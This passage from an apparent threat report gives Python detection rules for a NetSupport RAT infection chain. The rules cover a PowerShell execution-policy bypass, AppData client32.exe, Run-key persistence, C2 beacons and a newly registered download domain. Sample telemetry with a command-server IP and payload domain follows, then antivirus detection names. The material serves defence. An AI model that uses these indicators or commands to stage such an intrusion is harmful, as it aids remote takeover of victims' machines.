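NEW_DOMAIN_DAYS = 30                      # assumption: "newly registered" window
ANALYSIS_DATE = date(2026, 3, 12)         # date the report was written
# Constructed registration lookup (stand-in for a WHOIS/RDAP feed)
DOMAIN_REGISTERED = {"applicationhost17.com": date(2026, 3, 10)}

# %APPDATA%\<PREFIX-GUID>\client32.exe as the dropper lays it out on disk
APPDATA_CLIENT_RE = re.compile(
    r"\\AppData\\Roaming\\[A-Z]{2,3}-[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\\client32\.exe$",
    re.I,
)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\SystemUpdate_", re.I)
PS_BYPASS_RE = re.compile(r"-ExecutionPolicy\s+bypass", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    attack_id: str
    evidence: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: dict, today: date = ANALYSIS_DATE) -> list[Finding]:
    """Apply the report's behavioral indicators to one telemetry event."""
    found: list[Finding] = []
    kind = ev.get("type")
    if kind == "process":
        image, cmd = ev.get("image", ""), ev.get("cmdline", "")
        if (_basename(image) == "powershell.exe" and PS_BYPASS_RE.search(cmd)
                and _basename(ev.get("parent", "")) == "cmd.exe"):
            found.append(Finding("ps_bypass_from_cmd", "T1059.001", cmd))
        if APPDATA_CLIENT_RE.search(image):
            found.append(Finding("client32_in_appdata", "T1219", image))
    elif kind == "registry":
        target = ev.get("target", "")
        if RUN_KEY_RE.search(target):
            found.append(Finding("run_key_systemupdate", "T1547.001", target))
    elif kind == "http":
        host, path, ua = ev.get("host", ""), ev.get("path", ""), ev.get("ua", "")
        if ev.get("method") == "POST" and path == "/fakeurl.htm" and ua == NETSUPPORT_UA:
            found.append(Finding("netsupport_c2_beacon", "T1071.001", f"{host}{path}"))
        registered = DOMAIN_REGISTERED.get(host)
        if registered and (today - registered).days <= NEW_DOMAIN_DAYS and "WindowsPowerShell" in ua:
            found.append(Finding("ps_download_new_domain", "T1105", f"{host} registered {registered}"))
    elif kind == "dns":
        if ev.get("query", "").lower() == GEO_HOST and _basename(ev.get("image", "")) not in BROWSERS:
            found.append(Finding("netsupport_geo_lookup", "T1219", ev.get("image", "")))
    return found


def scan(events: list[dict], today: date = ANALYSIS_DATE) -> list[Finding]:
    return [f for ev in events for f in check_event(ev, today)]


# Constructed sample telemetry mirroring the execution flow in the report.
RAT_DIR = r"C:\Users\u\AppData\Roaming\TM-EA9F5A76-DE30-4BDF-9308-E1F4DF3B2569"
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy bypass -File C:\Users\u\AppData\Local\Temp\scr1A2B.ps1"},
    {"type": "http", "method": "GET", "host": "applicationhost17.com",
     "path": "/downloads/SY-5921A7EB-16A3-46CC-9EE6-0D8677D807DF.zip",
     "ua": "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237"},
    {"type": "registry", "target": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdate_jOTlMUPQ"},
    {"type": "process", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": RAT_DIR + r"\client32.exe", "cmdline": "client32.exe"},
    {"type": "dns", "query": "geo.netsupportsoftware.com", "image": RAT_DIR + r"\client32.exe"},
    {"type": "http", "method": "POST", "host": "172.94.9.4", "path": "/fakeurl.htm", "ua": NETSUPPORT_UA},
    # Benign look-alikes that must not fire:
    {"type": "dns", "query": "geo.netsupportsoftware.com",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe", "cmdline": "client32.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.attack_id}] {f.rule}: {f.evidence}")
```

Each finding carries the ATT&CK ID from the table above so the output can be routed straight into a case; the six malicious events produce six findings and the two benign ones produce none.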
AV Detection Names
- Kaspersky: Backdoor.PowerShell.RAbased.b, HEUR:Trojan.Script.NetSup.gen
- ESET: Win32/NetSupportManager.CC trojan, GenScript.AJRU trojan
- Microsoft: Trojan:Script/Wacatac.B!ml
- DrWeb: BackDoor.RMS.153
- Symantec: Trojan.Gen.NPE
- Malwarebytes: Floxif.Virus.FileInfector.DDS